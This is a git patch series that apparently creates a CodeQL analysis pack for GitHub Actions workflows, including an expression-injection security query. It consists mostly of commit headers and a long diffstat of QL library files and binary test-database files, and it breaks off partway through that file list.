From 70a7bb1f7566447d73ff56d3c27b4d6913cf984b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:25:33 +0100 Subject: [PATCH 001/707] Add .gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 000000000000..e43b0f988953 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.DS_Store From 45d959d13fb981ce2f8dc9e2396a5401321cb8a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:26:11 +0100 Subject: [PATCH 002/707] Initial implementation --- build-dbs.sh | 5 + codeql-workspace.yml | 3 + ql/lib/actions.qll | 1 + ql/lib/codeql-pack.lock.yml | 16 + ql/lib/codeql/Locations.qll | 71 +++ ql/lib/codeql/actions/Ast.qll | 256 ++++++++++ ql/lib/codeql/actions/Cfg.qll | 7 + ql/lib/codeql/actions/DataFlow.qll | 10 + ql/lib/codeql/actions/TaintTracking.qll | 10 + .../codeql/actions/ast/internal/Actions.qll | 400 ++++++++++++++++ ql/lib/codeql/actions/ast/internal/Yaml.qll | 50 ++ .../actions/controlflow/BasicBlocks.qll | 445 ++++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 169 +++++++ .../codeql/actions/dataflow/FlowSources.qll | 137 ++++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 31 ++ .../internal/DataFlowImplSpecific.qll | 11 + .../dataflow/internal/DataFlowPrivate.qll | 312 ++++++++++++ .../dataflow/internal/DataFlowPublic.qll | 78 +++ .../internal/TaintTrackingImplSpecific.qll | 11 + .../internal/TaintTrackingPrivate.qll | 30 ++ .../actions/ideContextual/IDEContextual.qll | 19 + .../codeql/actions/ideContextual/printAst.qll | 137 ++++++ ql/lib/codeql/files/FileSystem.qll | 177 +++++++ .../codeql-database.yml | 39 ++ ql/lib/ide-contextual-queries/printAst.ql | 29 ++ ql/lib/ide-contextual-queries/printCfg.ql | 53 +++ ql/lib/qlpack.gbo | 13 + ql/lib/qlpack.yml | 15 + ql/lib/test-db/baseline-info.json | 1 + ql/lib/test-db/codeql-database.yml | 10 + ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 24 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 32 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 24 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 1080 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 544 bytes .../db-yaml/default/cache/pages/01.pack | Bin 0 -> 118 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/15.pack | Bin 0 -> 131 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/34.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 0 -> 865 bytes .../db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 163 bytes .../db-yaml/default/cache/pages/43.pack | Bin 0 -> 368 bytes .../db-yaml/default/cache/pages/54.pack | Bin 0 -> 229 bytes .../db-yaml/default/cache/pages/55.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 0 -> 140 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 0 -> 1086 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 0 -> 156 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 0 -> 282 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 0 -> 596 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 0 -> 115 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 136 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/53.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 140 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 148 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/relations/06.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/11.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 272 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/9f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 0 -> 143 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 80 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 0 -> 8 bytes .../db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 0 -> 80 bytes .../db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/locations_default.rel | Bin 0 -> 1416 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes .../db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes .../db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes .../db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 0 -> 1416 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/yaml_locations.rel | Bin 0 -> 472 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 552 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 +++++++++++ ...tabase-index-files-20240203.101755.239.log | 15 + ql/lib/test-db/src.zip | Bin 0 -> 578 bytes ql/lib/test/test.ql | 59 +++ ql/lib/test/test.yml | 36 ++ ql/lib/yaml.dbscheme | 80 ++++ ql/lib/yaml.dbscheme.stats | 4 + .../Security/CWE-094/ExpressionInjection.ql | 37 ++ ql/src/codeql-pack.lock.yml | 16 + .../codeql-suites/actions-code-scanning.qls | 0 ql/src/qlpack.yml | 14 + ql/src/test-db/baseline-info.json | 1 + ql/src/test-db/codeql-database.yml | 10 + ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 80 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 116 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 80 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 4776 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 0 -> 260 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 0 -> 68 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 0 -> 2392 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 128 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2392 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 0 -> 16 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 0 -> 2672 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/04.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 125 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 162 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 0 -> 316 bytes .../db-yaml/default/cache/pages/32.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/46.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 0 -> 3805 bytes .../db-yaml/default/cache/pages/67.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 0 -> 664 bytes .../db-yaml/default/cache/pages/71.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 0 -> 618 bytes .../db-yaml/default/cache/pages/82.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 0 -> 354 bytes .../db-yaml/default/cache/pages/91.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/92.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 0 -> 2612 bytes .../db-yaml/default/cache/pages/95.pack | Bin 0 -> 124 bytes .../db-yaml/default/cache/pages/99.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 0 -> 1311 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 0 -> 149 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 797 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 0 -> 106 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 0 -> 119 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 0 -> 324 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 0 -> 173 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/de.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 0 -> 688 bytes .../db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 0 -> 117 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 339 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 537 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 0 -> 423 bytes .../db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 0 -> 213 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 367 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 0 -> 223 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 0 -> 410 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 0 -> 411 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 0 -> 408 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 375 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 0 -> 204 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 0 -> 225 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 0 -> 418 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 341 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 336 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 0 -> 219 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 0 -> 221 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 0 -> 215 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes .../db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/14.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/18.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/28.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/47.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/59.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/80.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/85.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/da.pack | Bin 0 -> 126 bytes ql/src/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 128 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/src/test-db/db-yaml/default/files.rel | Bin 0 -> 56 bytes .../db-yaml/default/files.rel.checksum 